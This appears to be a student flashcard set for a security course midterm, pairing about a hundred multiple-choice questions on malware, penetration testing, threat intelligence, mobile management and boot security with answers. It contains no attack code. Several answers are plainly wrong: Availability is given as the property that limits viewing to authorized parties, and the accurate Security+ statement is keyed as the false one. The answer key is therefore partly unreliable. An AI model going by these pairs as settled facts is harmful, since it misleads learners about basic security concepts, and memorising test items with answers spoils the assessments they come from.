MIS585 Midterm (Ch. 1-5)
Which model uses a sequential design process?
Waterfall model
Which of the following is technology that imitates human abilities? a. AI b. ML c. RC d. XLS
a. AI
What are the two limitations of private information sharing centers? a. Access to data and participation b. Government approval and cost c. Timing of reports and remote access d. Bandwidth and CPU
a. Access to data and participation
Agape has been asked to experiment with different hardware to create a controller for a new device on the factory floor. She needs a credit-card-sized motherboard that has a microcontroller instead of a microprocessor. Which would be the best solution? a. Arduino b. Raspberry Pi c. SoC d. FPGA
a. Arduino
Which of the following is NOT a characteristic of a penetration test? a. Automated b. Finds deep vulnerabilities c. Performed occasionally d. May use internal employees or external consultants
a. Automated
Oskar has been receiving emails about critical threat intelligence information from a public information sharing center. His team leader has asked him to look into how the process can be automated so that the information can feed directly into the team's technology security. What technology will Oskar recommend? a. Automated Indicator Sharing (AIS) b. Bidirectional Security Protocol (BSP) c. Linefeed Access d. Lightwire JSON Control
a. Automated Indicator Sharing (AIS)
Which type of malware relies on LOLBins? a. PUP b. File-based virus c. Fileless virus d. Bot
c. Fileless virus
Which of the following is NOT a characteristic of malware? a. Deceive b. Launch c. Imprison d. Diffusion
d. Diffusion
Which of the following is not true regarding security? a. Security is a goal. b. Security includes the necessary steps to protect from harm. c. Security is a process. d. Security is a war that must be won at all costs.
d. Security is a war that must be won at all costs.
Which of the following groups use advanced persistent threats? a. Brokers b. Criminal syndicates c. Shadow IT d. State actors
d. State actors
Which of the following is NOT an improvement of UEFI over BIOS? a. Stronger boot security b. Networking functionality in UEFI c. Access larger hard drives d. Support of USB 3.0
d. Support of USB 3.0
Lykke's supervisor is evaluating whether to use internal security employees to conduct a penetration test. Lykke does not consider this a good idea and has created a memo with several reasons they should not be used. Which of the following would NOT be part of that memo? a. The employees could have inside knowledge of the network that would give them an advantage. b. There may be a lack of expertise. c. Employees may have a reluctance to reveal a vulnerability. d. They would have to stay overnight to perform the test.
d. They would have to stay overnight to perform the test.
What race condition can result in a NULL pointer/ object dereference? a. Conflict race condition b. Value-based race condition c. Thread race condition d. Time of check/time of use race condition
d. Time of check/time of use race condition
Which of these is a list of preapproved applications? a. Greenlist b. Redlist c. Blacklist d. Whitelist
d. Whitelist
Complete this definition of information security: That which protects the integrity, confidentiality, and availability of information _________________. a. on electronic digital devices and limited analog devices that can connect via the Internet or through a local area network. b. through a long-term process that results in ultimate security. c. using both open-sourced as well as supplier-sourced hardware and software that interacts appropriately with limited resources. d. through products, people, and procedures on the devices that store, manipulate, and transmit the information.
d. through products, people, and procedures on the devices that store, manipulate, and transmit the information.
Which of the following is NOT a context-aware authentication? a. On-body detection b. Trusted places c. Trusted devices d. Trusted contacts
d. trusted contacts
What penetration testing level name is given to testers who have no knowledge of the network and no special privileges? a. Black box b. Gray box c. White box d. Purple box
a. Black box
Which group is responsible for the Cloud Controls Matrix? a. CSA b. CIS c. OSINT d. NIST
a. CSA
In her job interview, Xiu asks about the company policy regarding smartphones. She is told that employees may choose from a limited list of approved devices but that she must pay for the device herself; however, the company will provide her with a monthly stipend. Which type of enterprise deployment model does this company support? a. CYOD b. COPE c. BYOD d. Corporate owned
a. CYOD
What type of analysis is heuristic monitoring based on? a. Dynamic analysis b. Static analysis c. Code analysis d. Input analysis
a. Dynamic analysis
Which of the following is FALSE about a quarantine process? a. It holds a suspicious application until the user gives approval. b. It can send a sanitized version of the attachment. c. It can send a URL to the document that is on a restricted computer. d. It is most often used with email attachments.
a. It holds a suspicious application until the user gives approval.
Josh is researching the different types of attacks that can be generated through a botnet. Which of the following would NOT be something distributed by a botnet? a. LOLBins b. Spam c. Malware d. Ad fraud
a. LOLBins
What does Windows 10 Tamper Protection do? a. Limits access to the registry. b. Prevents any updates to the registry until the user approves the update. c. Compresses and locks the registry. d. Creates a secure backup copy of the registry.
a. Limits access to the registry.
Which tool manages the distribution and control of apps? a. MAM b. MDM c. MCM d. MFM
a. MAM
What allows a device to be managed remotely? a. Mobile device management (MDM) b. Mobile application management (MAM) c. Mobile resource management (MRM) d. Mobile wrapper management (MWM)
a. Mobile device management (MDM)
Which of the following manipulates the trusting relationship between web servers? a. SSRF b. CSRF c. EXMAL d. SCSI
a. SSRF
Which of the following is not a general information source that can provide valuable in-depth information on cybersecurity? a. Twitter b. Conferences c. Local industry groups d. Vendor websites
a. Twitter
What is the difference between a Trojan and a RAT? a. There is no difference. b. A RAT gives the attacker unauthorized remote access to the victim's computer. c. A Trojan can carry malware while a RAT cannot. d. A RAT can infect only a smartphone and not a computer.
b. A RAT gives the attacker unauthorized remote access to the victim's computer.
What is another name for footprinting? a. High-level reconnaissance b. Active reconnaissance c. Modeling d. Revealing
b. Active reconnaissance
What word is the currently accepted term to refer to network-connected hardware devices? a. Host b. Endpoint c. Device d. Client
b. Endpoint
Which of the following tries to detect and stop an attack? a. HIDS b. HIPS c. RDE d. SOMA
b. HIPS
Which type of OS is typically found on an embedded system? a. SoC b. RTOS c. OTG d. COPE
b. RTOS
Which of the following can automate an incident response? a. SIEM b. SOAR c. CVCC d. SOSIA
b. SOAR
What prevents a mobile device from being used until the user enters the correct passcode? a. Swipe identifier (SW-ID) b. Screen lock c. Screen timeout d. Touch swipe
b. Screen lock
Which premise is the foundation of threat hunting? a. Cybercrime will only increase. b. Threat actors have already infiltrated our network. c. Attacks are becoming more difficult. d. Pivoting is more difficult to detect than ever before.
b. Threat actors have already infiltrated our network.
Which of the following attacks targets the external software component that is a repository of both code and data? a. Application program interface (API) attack b. Device driver manipulation attack c. Dynamic-link library (DLL) injection attack d. OS REG attack
c. Dynamic-link library (DLL) injection attack
Which of the following is NOT a means by which a bot communicates with a C&C device? a. Signing into a website the bot herder operates b. Signing in to a third-party website c. Email d. Command sent through Twitter posts
c. Email
Which of the following is not used to describe those who attack computer systems? a. Threat actor b. Hacker c. Malicious agent d. Attacker
c. Malicious agent
Which of the following is not a recognized attack vector? a. Supply chain b. Social media c. On-prem d. Email
c. On-prem
Randall's roommate is complaining to him about all of the software that came pre-installed on his new computer. He doesn't want the software because it slows down the computer. What type of software is this? a. Spyware b. BOT c. PUP d. Keylogger
c. PUP
Which privacy protection uses four colors to indicate the expected sharing limitations that are to be applied by recipients of the information? a. CISA b. FOIA c. TLP d. PCII
c. TLP
What is an objective of state-sponsored attackers? a. To right a perceived wrong b. To amass fortune over of fame c. To spy on citizens d. To sell vulnerabilities to the highest bidder
c. To spy on citizens
Which of the following is NOT something that a SIEM can perform? a. User behavior analysis b. Sentiment analysis c. Log aggregation d. Incident response
d. Incident response
What does containerization do? a. It splits operating system functions only on specific brands of mobile devices. b. It places all keys in a special vault. c. It slows down a mobile device to half speed. d. It separates personal data from corporate data.
d. It separates personal data from corporate data.
Does an IOC occur when what metric exceeds its normal bounds? a. IRR b. LRG c. EXR d. KRI
d. KRI
When researching how an attack recently took place, Nova discovered that the threat actor, after penetrating the system, started looking to move through the network with their elevated position. What is the name of this technique? a. Jumping b. Twirling c. Squaring up d. Lateral movement
d. Lateral movement
Which boot security mode sends information on the boot process to a remote server? a. UEFI Native Mode b. Secure Boot c. Trusted Boot d. Measured Boot
d. Measured Boot
Which of these is considered the strongest type of passcode to use on a mobile device? a. Password b. PIN c. Fingerprint swipe d. Draw connecting dots pattern
a. Password
Banko's sister has just downloaded and installed an app that allows her to circumvent the built-in limitations on her Android smartphone. What is this called? a. Rooting b. Sideloading c. Jailbreaking d. Ducking
a. Rooting
Tuva's supervisor wants to share a recent audit outside the organization. Tuva warns him that this type of audit can only be read by those within the organization. What audit does Tuva's supervisor want to distribute? a. SSAE SOC 2 Type II b. SSAE SOC 2 Type III c. SSAE SOC 3 Type IV d. SSAE SOC 3.2 Type X
a. SSAE SOC 2 Type II
Tilde is working on a contract with the external penetration testing consultants. She does not want any executives to receive spear-phishing emails. Which rule of engagement would cover this limitation? a. Scope b. Exploitation c. Targets d. Limitations and exclusions
a. Scope
Which of the following groups have the lowest level of technical knowledge? a. Script kiddies b. Hacktivists c. State actors d. Insiders
a. Script Kiddies
Which of the following is true regarding the relationship between security and convenience? a. Security and convenience are inversely proportional. b. Security and convenience have no relationship. c. Security is less important than convenience. d. Security and convenience are equal in importance.
a. Security and convenience are inversely proportional.
Which of the following is false about the CompTIA Security+ certification? a. Security+ is one of the most widely acclaimed security certifications. b. Security+ is internationally recognized as validating a foundation level of security skills and knowledge. c. The Security+ certification is a vendor-neutral credential. d. Professionals who hold the Security+ certification earn about the same or slightly less than security professionals who have not achieved this certification.
a. Security+ is one of the most widely acclaimed security certifications.
Which of these would NOT be considered the result of a logic bomb? a. Send an email to Rowan's inbox each Monday morning with the agenda of that week's department meeting. b. If the company's stock price drops below $50, then credit Oscar's retirement account with one additional year of retirement credit. c. Erase the hard drives of all the servers 90 days after Alfredo's name is removed from the list of current employees. d. Delete all human resource records regarding Augustine one month after he leaves the company.
a. Send an email to Rowan's inbox each Monday morning with the agenda of that week's department meeting.
What is the term used to describe the connectivity between an organization and a third party? a. System integration b. Platform support c. Resource migration d. Network layering
a. System integration
Gabriel's sister called him about a message that suddenly appeared on her screen that says her software license has expired and she must immediately pay $500 to have it renewed before control of the computer will be returned to her. What type of malware has infected her computer? a. Persistent lockware b. Blocking ransomware c. Cryptomalware d. Impede-ware
b. Blocking ransomware
Marius's team leader has just texted him that an employee, who violated company policy by bringing in a file on her USB flash drive, has just reported that her computer is suddenly locked up with cryptomalware. Why would Marius consider this a dangerous situation? a. It sets a precedent by encouraging other employees to violate company policy. b. Cryptomalware can encrypt all files on any network that is connected to the employee's computer. c. The organization may be forced to pay up to $500 for the ransom. d. The employee would have to wait at least an hour before her computer could be restored.
b. Cryptomalware can encrypt all files on any network that is connected to the employee's computer.
Luka has been asked by his supervisor to monitor the dark web for any IOCs concerning their organization. The next week, Luca reports that he was unable to find anything because looking for information on the dark web is different from using the regular web. Which of the following is FALSE about looking for information on the dark web? a. It is necessary to use Tor or IP2. b. Dark web search engines are identical to regular search engines. c. Dark web merchants open and close their sites without warning. d. The naming structure is different on the dark web.
b. Dark web search engines are identical to regular search engines.
Luna is reading a book about the history of cybercrime. She read that the very first cyberattacks were mainly for what purpose? a. Fortune b. Fame c. Financial gain d. Personal security
b. Fame
What enforces the location in which an app can function by tracking the location of the mobile device? a. Location resource management b. Geofencing c. GPS tagging d. Graphical Management Tracking (GMT)
b. Geofencing
What is the process of identifying the geographical location of a mobile device? a. Geotracking b. Geolocation c. GeoID d. Geomonitoring
b. Geolocation
Which ISO contains controls for managing and controlling risk? a. ISO XRS b. ISO 31000 c. ISO 271101 d. ISO 27555
b. ISO 31000
Which of the following of the CIA Triad ensures that information is correct, and no unauthorized person has altered it? a. Confidentiality b. Integrity c. Availability d. Assurance
b. Integrity
What is the advantage of a secure cookie? a. It cannot be stored on the local computer without the user's express permission. b. It is sent to the server over HTTPS. c. It is analyzed by AV before it is transmitted. d. It only exists in RAM and is deleted once the web browser is closed.
b. It is sent to the server over HTTPS.
Which of these is NOT a security feature for locating a lost or stolen mobile device? a. Remote lockout b. Last known good configuration c. Alarm d. Thief picture
b. Last known good configuration
Which of the following is NOT an advantage of crowdsourced penetration testing? a. Faster testing b. Less expensive c. Ability to rotate teams d. Conducting multiple tests simultaneously
b. Less expensive
What are the two concerns about using public information sharing centers? a. Cost and availability b. Privacy and speed c. Security and privacy d. Regulatory approval and sharing
b. Privacy and speed
Which type of hacker will probe a system for weaknesses and then privately provide that information back to the organization? a. Black hat hackers b. White hat hackers c. Gray hat hackers d. Red hat hackers
b. White Hat Hackers
Which of the following is known as a network virus? a. TAR b. Worm c. Remote exploitation virus (REV) d. C&C
b. Worm
Which of the following attacks is based on a website accepting user input without sanitizing it? a. RSS b. XSS c. SQLS d. SSXRS
b. XSS
Which tool is most commonly associated with state actors? a. Closed-Source Resistant and Recurrent Malware (CSRRM) b. advanced persistent threat (APT) c. Unlimited Harvest and Secure Attack (UHSA) d. Network Spider and Worm Threat (NSAWT)
b. advanced persistent threat (APT)
Hisoka is creating a summary document for new employees about their options for different mobile devices. One part of his report covers encryption. What would Hisoka NOT include in his document? a. All modern versions of mobile device OS encrypt all user data by default. b. Encryption occurs when the mobile device is locked. c. Apple uses file-based encryption to offer a higher level of security. d. Data backed up to an Apple or Google server could be unlocked by a court order.
c. Apple uses file-based encryption to offer a higher level of security.
Which of the following ensures that only authorized parties can view protected information? a. Authorization b. Confidentiality c. Availability d. Integrity
c. Availability
What is the category of threat actors that sell their knowledge of vulnerabilities to other attackers or governments? a. Cyberterrorists b. Competitors c. Brokers d. Resource managers
c. Brokers
Which of the following attacks is based on the principle that when a user is currently authenticated on a website and then loads another webpage, the new page inherits the identity and privileges of the first website? a. SSFR b. DLLS c. CSRF d. DRCR
c. CSRF
Ebba has received a new initiative for her security team to perform an in-house penetration test. What is the first step that Ebba should undertake? a. Approval b. Budgeting c. Planning d. Documentation
c. Planning
Which of these is used to send SMS text messages to selected users or groups of users? a. Pull notification services b. Replay notification distribution (RND) c. Push notification services d. MAM mass SMS
c. Push notification services
What term refers to changing the design of existing code? a. Library manipulation b. Shimming c. Refactoring d. Design driver manipulation
c. Refactoring
Which of the following are developed by established professional organizations or government agencies using the expertise of seasoned security professionals? a. Legislation b. White papers c. Regulations d. Benchmarks
c. Regulations
Which is the final rule of engagement that would be conducted in a pen test? a. Cleanup b. Communication c. Reporting d. Exploitation
c. Reporting
Which statement regarding a keylogger is NOT true? a. Software keyloggers can be designed to send captured information automatically back to the attacker through the Internet. b. Hardware keyloggers are installed between the keyboard connector and computer keyboard USB port. c. Software keyloggers are generally easy to detect. d. Keyloggers can be used to capture passwords, credit card numbers, or personal information.
c. Software keyloggers are generally easy to detect.
Which stage conducts a test that will verify the code functions as intended? a. Production stage b. Testing stage c. Staging stage d. Development stage
c. Staging stage
Which of the following is an application protocol for exchanging cyberthreat intelligence over HTTPS? a. STIX b. AIP-TAR c. TAXII d. TCP-Over-Secure (ToP)
c. TAXII
Which of the following is NOT a limitation of a threat map? a. Many maps claim that they show data in real time, but most are simply a playback of previous attacks. b. Because threat maps show anonymized data, it is impossible to know the identity of the attackers or the victims. c. They can be difficult to visualize. d. Threat actors usually mask their real locations, so what is displayed on a threat map is incorrect.
c. They can be difficult to visualize.
How do vendors decide which should be the default settings on a system? a. Those that are the most secure are always the default settings. b. There is no reason specific default settings are chosen. c. Those settings that provide the means by which the user can immediately begin to use the product. d. The default settings are always mandated by industry standards.
c. Those settings that provide the means by which the user can immediately begin to use the product.
Hakaku needs a tool with a single management interface that provides capabilities for managing and securing mobile devices, applications, and content. Which tool would be the best solution? a. MCCM b. MDM c. UEM d. MMAM
c. UEM
Enki received a request by a technician for a new subnotebook computer. The technician noted that he wanted USB OTG support and asked Enki's advice regarding it. Which of the following would Enki NOT tell him? a. A device connected via USB OTG can function as a peripheral for external media access. b. A device connected via USB OTG can function as a host. c. USB OTG is only available for connecting Android devices to a subnotebook. d. Connecting a mobile device to an infected computer using USB OTG could allow malware to be sent to that device.
c. USB OTG is only available for connecting Android devices to a subnotebook.
Which of the following is NOT an advantage of an automated patch update service? a. Downloading patches from a local server instead of using the vendor's online update service can save bandwidth and time because each computer does not have to connect to an external server. b. Administrators can approve updates for "detection" only; this allows them to see which computers require the update without installing it. c. Users can disable or circumvent updates just as they can if their computer is configured to use the vendor's online update service. d. Administrators can approve or decline updates for client systems, force updates to install by a specific date, and obtain reports on what updates each computer needs.
c. Users can disable or circumvent updates just as they can if their computer is configured to use the vendor's online update service.
Aoi has been asked to provide research regarding adding a new class of Android smartphones to a list of approved devices. One of the considerations is how frequently the smartphones receive firmware OTA updates. Which of the following reasons would Aoi NOT list in her report as a factor in the frequency of Android firmware OTA updates? a. OEMs are hesitant to distribute Google updates because it limits their ability to differentiate themselves from competitors if all versions of Android start to look the same through updates. b. Because many of the OEMs have modified Android, they are reluctant to distribute updates that could potentially conflict with their changes. c. Wireless carriers are reluctant to provide firmware OTA updates because of the bandwidth the updates consume on their wireless networks. d. Because OEMs want to sell as many devices as possible, they have no financial incentive to update mobile devices that users would then continue to use indefinitely.
c. Wireless carriers are reluctant to provide firmware OTA updates because of the bandwidth the updates consume on their wireless networks.
1. Akira is explaining to his team members the security constraints that have made it a challenge for protecting a new embedded system. Which of the following would Akira NOT include as a constraint? a. Authentication b. Cost c. Power d. Availability
d. Availability
Which type of memory vulnerability attack manipulates the "return address" of the memory location of a software program? a. Shim overflow attack b. Factor overflow attack c. Integer overflow attack d. Buffer overflow attack
d. Buffer overflow attack
Which of the following is not a reason a legacy platform has not been updated? a. Limited hardware capacity b. An application only operates on a specific OS version c. Neglect d. No compelling reason for any updates
d. No compelling reason for any updates
Which of the following is a standard for the handling of customer card information? a. DRD STR b. OSS XRS c. RMR CDC d. PCI DSS
d. PCI DSS
Which of the following is not an issue with patching? a. Difficulty patching firmware b. Few patches exist for application software c. Delays in patching OSs d. Patches address zero-day vulnerabilities
d. Patches address zero-day vulnerabilities
Which of the following technologies can convert a texting app into a live chat platform? a. MMS b. QR c. SMS d. RCS
d. RCS
Linnea has requested to be placed on the penetration testing team that scans for vulnerabilities to exploit them. Which team does she want to be placed on? a. Blue Team b. Purple Team c. White Team d. Red Team
d. Red Team
What are documents that are authored by technology bodies employing specialists, engineers, and scientists who are experts in those areas? a. Cybersecurity feeds b. White notebooks c. Blue papers d. Requests for comments (RFCs)
d. Requests for comments (RFCs)
Which of the following is NOT an important OS security configuration? a. Employing least functionality b. Disabling default accounts c. Disabling unnecessary services d. Restricting patch management
d. Restricting patch management
After Bella earned her security certification, she was offered a promotion. As she reviewed the job responsibilities, she saw that in this position she will report to the CISO and supervise a group of security technicians. Which of these generally recognized security positions has she been offered? a. Security Administrator b. Security technician c. Security officer d. Security manager
d. Security Manager
